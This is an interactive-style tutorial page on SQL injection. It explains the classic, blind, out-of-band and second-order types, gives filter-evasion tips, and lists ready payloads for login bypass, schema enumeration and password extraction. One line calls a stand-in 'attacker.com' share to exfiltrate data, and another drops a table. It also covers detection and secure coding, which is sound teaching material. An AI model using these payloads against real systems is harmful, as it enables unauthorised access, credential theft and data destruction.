🎮 Interactive SQL Injection Simulator
Try these payloads in our safe demo environment to see how SQL injection works in action!
Login Form Simulator
Try these payloads in the username field:
Generated query will appear here when you click "Login"
📚 SQL Injection Types Explained
1. Classic SQL Injection
The OG attack that started it all. When user input gets directly concatenated into SQL queries.
SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything'
The -- comments out the rest of the query, bypassing password check!
2. Blind SQLi (The Sneaky One)
When you don't get direct output but can infer information based on behavior.
Boolean-based: admin' AND 1=1-- (returns true/false patterns)
Time-based: admin'; IF (1=1) WAITFOR DELAY '0:0:5'-- (delays response when true)
3. Out-of-Band SQLi (The Fancy One)
When you make the database call out to external systems to exfiltrate data.
'; EXEC master..xp_dirtree '\\attacker.com\share'--
This makes the database attempt to list a network share on your server!
4. Second-Order SQLi (The Patient One)
When your payload gets stored and executed later by another function.
Example:
// User registration
INSERT INTO comments (text) VALUES ('Nice post!'; DROP TABLE users--')
// Later when admin views comments... boom!
🔍 Identifying Vulnerable Endpoints
During Testing:
- Error Probing: Look for SQL errors when sending special characters (
',",;) - Boolean Tests: Try
' AND 1=1--vs' AND 1=2--and compare responses - Time Delays:
'; WAITFOR DELAY '0:0:5'--to test for blind SQLi - UNION Attacks: Find column count with
' ORDER BY X--incrementing X until error
During Code Review:
# UNSAFE - Direct string concatenation (VULNERABLE) query = "SELECT * FROM users WHERE username = '" + username + "'" # SAFE - Parameterized queries (SECURE) query = "SELECT * FROM users WHERE username = %s" cursor.execute(query, (username,))
Red Flags in Code:
- String building with user input
- Use of
exec()or dynamic SQL - No input validation/sanitization
- Raw SQL queries instead of ORM
- Overly permissive database users
🧠 Payload Crafting Guide
Structure Your Attack:
- Break Out: Close the current context (
',",)) - Inject: Add your malicious SQL (
OR 1=1,UNION SELECT, etc.) - Comment Out: Neutralize the rest (
--,#,/*)
Pro Tips:
- Use
/**/instead of spaces if spaces are filtered - Try
CHR(65)instead ofAif quotes are escaped - For numbers:
1 OR 1=1instead of string-based injections - Hex encoding can bypass some filters:
0x61646d696e= 'admin' - Try alternative comment syntax:
--,#,/**/
Common Payloads:
Authentication Bypass: ' OR '1'='1'-- Database Version: ' UNION SELECT 1,version(),3-- Table Names: ' UNION SELECT 1,table_name,3 FROM information_schema.tables-- Column Names: ' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- Data Exfiltration: ' UNION SELECT 1,username||':'||password,3 FROM users--
🛡️ Defense Mechanisms
SQL Injection Defense Checklist
- Use prepared statements (parameterized queries)
- Implement proper error handling (no DB errors to client)
- Apply least privilege DB accounts
- Use WAFs as secondary defense
- Regular security testing and code reviews
- Input validation (whitelist approach)
- Use ORMs with built-in protection
- Implement rate limiting
Secure Coding Examples:
Java (JDBC):
// UNSAFE String query = "SELECT * FROM users WHERE username = '" + username + "'"; Statement stmt = connection.createStatement(); ResultSet rs = stmt.executeQuery(query); // SAFE String query = "SELECT * FROM users WHERE username = ?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, username); ResultSet rs = pstmt.executeQuery();
PHP:
// UNSAFE
$query = "SELECT * FROM users WHERE username = '" . $_GET['username'] . "'";
$result = mysqli_query($conn, $query);
// SAFE
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_GET['username']);
$stmt->execute();
$result = $stmt->get_result();
🏆 Challenge Area
Test your SQL injection skills with these progressive challenges:
Challenge 1: Basic Login Bypass
Bypass the login form without knowing valid credentials.
Challenge 2: Database Schema Extraction
Extract the database version using a UNION attack.
Challenge 3: Blind Data Exfiltration
Extract the admin password one character at a time using boolean responses.
🎉 Congratulations!
You've completed all challenges! Here's your badge:
You're now a certified SQL Injection Ninja!